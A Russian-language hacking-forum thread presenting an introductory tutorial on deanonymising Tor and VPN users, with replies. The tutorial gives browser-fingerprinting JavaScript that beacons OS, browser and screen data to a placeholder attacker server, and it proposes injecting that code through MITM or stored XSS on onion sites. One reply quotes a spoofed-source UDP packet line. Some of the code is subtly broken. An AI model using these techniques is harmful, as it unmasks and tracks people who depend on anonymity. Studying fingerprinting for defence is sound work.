• 🚨 Ещё можно успеть на курс «OSINT: технология боевой разведки» от Академии Кодебай

    🔍 Изучите методы разведки с использованием открытых источников (OSINT) для проведения успешных атак.
    🛠️ Освойте ключевые инструменты, такие как Maltego, TheHarvester и другие.
    🧪 Пройдите практические лабораторные работы, имитирующие реальную разведку.
    🧠 Развивайте навыки, которые помогут вам стать экспертом в области информационной безопасности.

    Запись открыта до 23 мая Подробнее о курсе ...

Статья Деанонимизация пользователей, Введение

  • Автор темы Автор темы DefWolf
  • Дата начала Дата начала
1579468767535.png

Многие думают, что раз они настроили VPN или Tor, то шанс, что их вычислят равен 0. Они не правы. Вообще, что значит сам термин Деанонимизация ?

Деанонимизация - это нарушение анонимности, когда о вас узнают, то что вы скрывали начиная от ip адреса, заканчивая Именем и Фамилией. Все мы оставляем некие цифровые следы или как их еще называют кибер тень. Это информация о нас как долго мы находились в сети, наши куки, информация о разрешении нашего монитора, установленных в системе шрифтов, часового пояса, какие плагины установлены в вашем браузере. Из всех полученных данных составляют цифровой след. Далее идет система мониторинга, т.е идет сравнение следа, где и какие сайты вы посещали. Соглашусь, что звучит это как-то нереально, это действительно рабочий способ, давно применяемый на практике. Итак, давайте приступим к написания скрипта.

Первое, что нам нужно узнать - это OC:
JavaScript:
var pic = new Image();
pic.src = 'http:Youserver//?info='+navigator.platform; // OC
Далее нам нужно собрать HTTP заголовки и информацию о браузере:
JavaScript:
pic.src ='http:Youserver//?info='+ navigator.appName     //Имя браузера
pic.src = 'http:Youserver//?info='+ navigator.userAgent   //Агент пользователя
pic.src = 'http:Youserver//?info='+ navigator.appVersion  //Версия броузера
pic.src = 'http:Youserver//?info='+ lnavigator.language   //Язык системы
Далее соберем как можно более подробную информацию о компьютере:
JavaScript:
pic.src = +screen.width      //Ширина монитора
pic.scr = 'http:Youserver//?info='+screen.height     //Высота  монитора
pic.src = 'http:Youserver//?info='+screen.pixelDepth //Разрешение монитора
pic.src = 'http:Youserver//?info='+screen.colorDepth //Цетовая гамма

А этот код выведет оставшуюся информацию из объекта navigator:
JavaScript:
for(var prop in navigator) {
if (navigator[prop] instanceof Object || navigator[prop]==='') continue
conole.log(prop+": "+navigator[prop])
}
Так как это вводная статья мы остановимся. И перейдем к способам деанонимизации Tor. Итак, допустим наша цель пользуется Tor и чувствует себя вполне безопасно. Что же мы можем сделать, мы можем провести MITM атаку и вставить Javascript код во все посещаемые страницы. Можем поднять подготовленную страницу под определенную аудиторию, допустим наша цель любит Хакерские форумы. Найти уязвимые к хранимым XSS сайты и вставить наш код. Исследователи просканировали 100 onion сайтов и 30% из них были уязвимы к XSS. Мы можем собрать уникальную БД цифровых следов. Идентифицировать Tor пользователя можно использую функцию:
Код:
 measureText() и getBoundingClientRect()
Если мы получим уникальное значение, то мы сможем идентифицировать пользователя. Первая функция измеряет ширину текста, а вторая позволяют узнать ширину и высоту прямоугольника. Еще способы идентификации это измерить скорость взаимодействия с колёсиком мыши и получить характеристику CPU пользователя.

38ffea79991af4ff078c34534893247f.png


84be19eb0a7325e9b69523c66a90ea79.png


Noscript снизит риск всего на 50%. Так что сильно на него не надейтесь. Это была теоретическая статья и в следующей статье мы рассмотрим на практики, где в качестве цели будем идентифицировать пользователей уязвимого onion сайта. Пока насчет MITM атаки не знаю, но XSS будет точно.
 
anonymous_fuck_the_world_by_guyfawkesmaskers-d9f7avv.jpg
Многие думают, что раз они настроили VPN или Tor, то шанс, что их вычислят равен 0. Они не правы. Вообще, что значит сам термин Деанонимизация ?
Деанонимизация - это нарушение анонимности, когда о вас узнают, то что вы скрывали начиная от ip адреса, заканчивая Именем и Фамилией. Все мы оставляем некие цифровые следы или как их еще называют кибер тень. Это информация о нас как долго мы находились в сети, наши куки, информация о разрешении нашего монитора, установленных в системе шрифтов, часового пояса, какие плагины установлены в вашем браузере. Из всех полученных данных составляют цифровой след. Далее идет система мониторинга, т.е идет сравнение следа, где и какие сайты вы посещали. Соглашусь, что звучит это как-то нереально, это действительно рабочий способ, давно применяемый на практике. Итак, давайте приступим к написания скрипта.

Первое, что нам нужно узнать - это OC:
JavaScript:
var pic = new Image();
pic.src = 'http:Youserver//?info='+navigator.platform; // OC
Далее нам нужно собрать HTTP заголовки и информацию о браузере:
JavaScript:
pic.src ='http:Youserver//?info='+ navigator.appName     //Имя браузера
pic.src = 'http:Youserver//?info='+ navigator.userAgent   //Агент пользователя
pic.src = 'http:Youserver//?info='+ navigator.appVersion  //Версия броузера
pic.src = 'http:Youserver//?info='+ lnavigator.language   //Язык системы
Далее соберем как можно более подробную информацию о компьютере:
JavaScript:
pic.src = +screen.width      //Ширина монитора
pic.scr = 'http:Youserver//?info='+screen.height     //Высота  монитора
pic.src = 'http:Youserver//?info='+screen.pixelDepth //Разрешение монитора
pic.src = 'http:Youserver//?info='+screen.colorDepth //Цетовая гамма

А этот код выведет оставшуюся информацию из объекта navigator:
JavaScript:
for(var prop in navigator) {
if (navigator[prop] instanceof Object || navigator[prop]==='') continue
conole.log(prop+": "+navigator[prop])
}

Так как это вводная статья мы остановимся. И перейдем к способам деанонимизации Tor. Итак, допустим наша цель пользуется Tor и чувствует себя вполне безопасно. Что же мы можем сделать, мы можем провести MITM атаку и вставить Javascript код во все посещаемые страницы. Можем поднять подготовленную страницу под определенную аудиторию, допустим наша цель любит Хакерские форумы. Найти уязвимые к хранимым XSS сайты и вставить наш код. Исследователи просканировали 100 onion сайтов и 30% из них были уязвимы к XSS. Мы можем собрать уникальную БД цифровых следов. Идентифицировать Tor пользователя можно использую функцию:
Код:
 measureText() и getBoundingClientRect()
Если мы получим уникальное значение, то мы сможем идентифицировать пользователя. Первая функция измеряет ширину текста, а вторая позволяют узнать ширину и высоту прямоугольника. Еще способы идентификации это измерить скорость взаимодействия с колёсиком мыши и получить характеристику CPU пользователя.
38ffea79991af4ff078c34534893247f.png

84be19eb0a7325e9b69523c66a90ea79.png


Noscript снизит риск всего на 50%. Так что сильно на него не надейтесь. Это была теоретическая статья и в следующей статье мы рассмотрим на практики, где в качестве цели будем идентифицировать пользователей уязвимого onion сайта. Пока насчет MITM атаки не знаю, но XSS будет точно.
Очень круто что затронул такую интересную тему, но она поможет только в случае когда человек использует : vpn tor и не поможет в случает когда в цепочке присутствует дедик
В общем пиши дальше конечно, но она скорее для деанонимизации среднестатистического юзера
 
  • Нравится
Реакции: DefWolf
Все конечно круто, сам давно изучаю этот вопрос. Но тут есть одна хитрость-виртуалка. Что мешает теперь подогнать в vmware любую ОСь и пропустить через Whonix шлюх? Смена всех твоих отпечатков будет по default. Так что не парься. А вообще если посерфить просто, юзай Tails и будет тебе счастье. Если захочешь скрыть трафик от провайдера, настройка VPN перед тем как в сеть выйти и потом уже в TOR
 
  • Нравится
Реакции: Clotinon
Хорошая и полезная статья о "пишем сами детекты для whoer.net" :)
Фактически, очень полезно сделать свой ресурс такого плана, для тестировки и обратной связи для своих различных ботов и веб-скраперов, чтобы проверять, насколько корректно фингерпринты генерятся.
 
  • Нравится
Реакции: Clotinon и DefWolf
Чуть выше сама статья.
Очень круто что затронул такую интересную тему, но она поможет только в случае когда человек использует : vpn tor и не поможет в случает когда в цепочке присутствует дедик
 
И ты прав, в след. статье сделаю небольшое отступление от взлома onion и расскажу о дедике.
 

Ваше --> Очень круто что затронул такую интересную тему, но она поможет только в случае когда человек использует : vpn tor и не поможет в случает когда в цепочке присутствует дедик

Мое --> Вот именно такие и совершают провалы, ощущая себя под защитой.

Данным коментарием, я выражаю мысль: 80% людей, начавших свой жизненный цикл в теме ИБ, кроме как ВПН и ТОР не знают, для них это панацея от всех болезней. Как следствие, люди выходят на разного рода подвиги, обувшись в ТОР и обернув себя ВПН, и при нужном или не нужном исходе события оказываются раскрыты, к примеру по той схеме, как описал топик стартер.

Я констатитрую факт через Ваше высказывание.
 
Написано все грамотно.
Но это только для начинающих.

В реалиях, упертые красноглазиги страдающие паранойей гораздо сильнее усложняют задачу следящему.
 
И ни слова про выходную ноду тора....которую нужно поднимать самим... )
 
Да и как же без Beef'а в случае если есть конкретная цель и вектор - XSS
 
Оба коммента выше, так и не поняли, о чем здесь, мы деанонимизируем, а не защищаемся,на codeby много статей уже написано про анонимность, и вместо Beef, мы будем использовать другой инструмент специально написанный для этих целей
 
самые уязвимые места для деанона это
DNS
http
Java Script
WebRTC
flash
...
в каждой из этих технологий есть масса уязвимостей которые ведут к 100% деанону.
соответственно отключив их..
вот тогда было бы интересно почитать что еще уязвимо, какие технологии. а так это из пустого в порожнее переливать.
dns открытым текстом на 53 порту, http открытым текстом, java script определяет все параметры браузера и системы,
webrtc вообще traceroute но со стороны сайта, flash..
все это давно известно лет как 10 и не пинает разве что совсем ленивый
 
самые уязвимые места для деанона это
DNS
http
Java Script
WebRTC
flash
...
в каждой из этих технологий есть масса уязвимостей которые ведут к 100% деанону.
соответственно отключив их..
вот тогда было бы интересно почитать что еще уязвимо, какие технологии. а так это из пустого в порожнее переливать.
dns открытым текстом на 53 порту, http открытым текстом, java script определяет все параметры браузера и системы,
webrtc вообще traceroute но со стороны сайта, flash..
все это давно известно лет как 10 и не пинает разве что совсем ленивый
Это были новые методы деадона открытые менее года назад, про dns и http и так все знают и они уже давно как не рабочие, т.к. уязвимости заделывают, попробуй одной из перечисленных технологий сделать деадон. Но я рассмотрю эти технологии в след. статье вместе с практикой.
это то все понятно, проблема в другом, в dump трафике видно что что-то происходит с ip жертвы, не стал разбираться, заменил прямо в коде
packet = send(IP(dst=servers, src='MY_TEST_IP')/UDP(dport=port)/Raw(load=data), count=int(powers))

Если я правильно понял, нужно посылать от имени IP жертвы, и надеяться, что по сему пути, провайдеры не выкинут такие пакеты..
открытым текстом на 53
Он у большинства года как 3 закрыт. К 100% деадону в TOR ни один из твоих способов не приведет, можешь сам проверить на практике.
 
Последнее редактирование:
Это были новые методы деадона открытые менне года назад, про dns и http и так все знают
какие новые?) похожие Java Script как в статье, были на сайте например 2ip.ru еще году в 2006
flash тоже самое
WebRTC относительно новая технология, но и ей уже года 3-4
 
какие новые?) похожие Java Script как в статье, были на сайте например 2ip.ru еще году в 2006
flash тоже самое
WebRTC относительно новая технология, но и ей уже года 3-4
Новые всмысле определять пользователя по движении мышки, шрифтам, получить характеристику CPU =) . Это позволяет составить более уникальный цифровой след. И самое интересное, что разработчики заявили, что они не будут блокировать эти функции. Это была 1 часть статьи. В дальнейшим мы рассмотрим еще пару способов уже более интересных на практике.
 
Последнее редактирование:
  • Нравится
Реакции: Clotinon
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Курс AD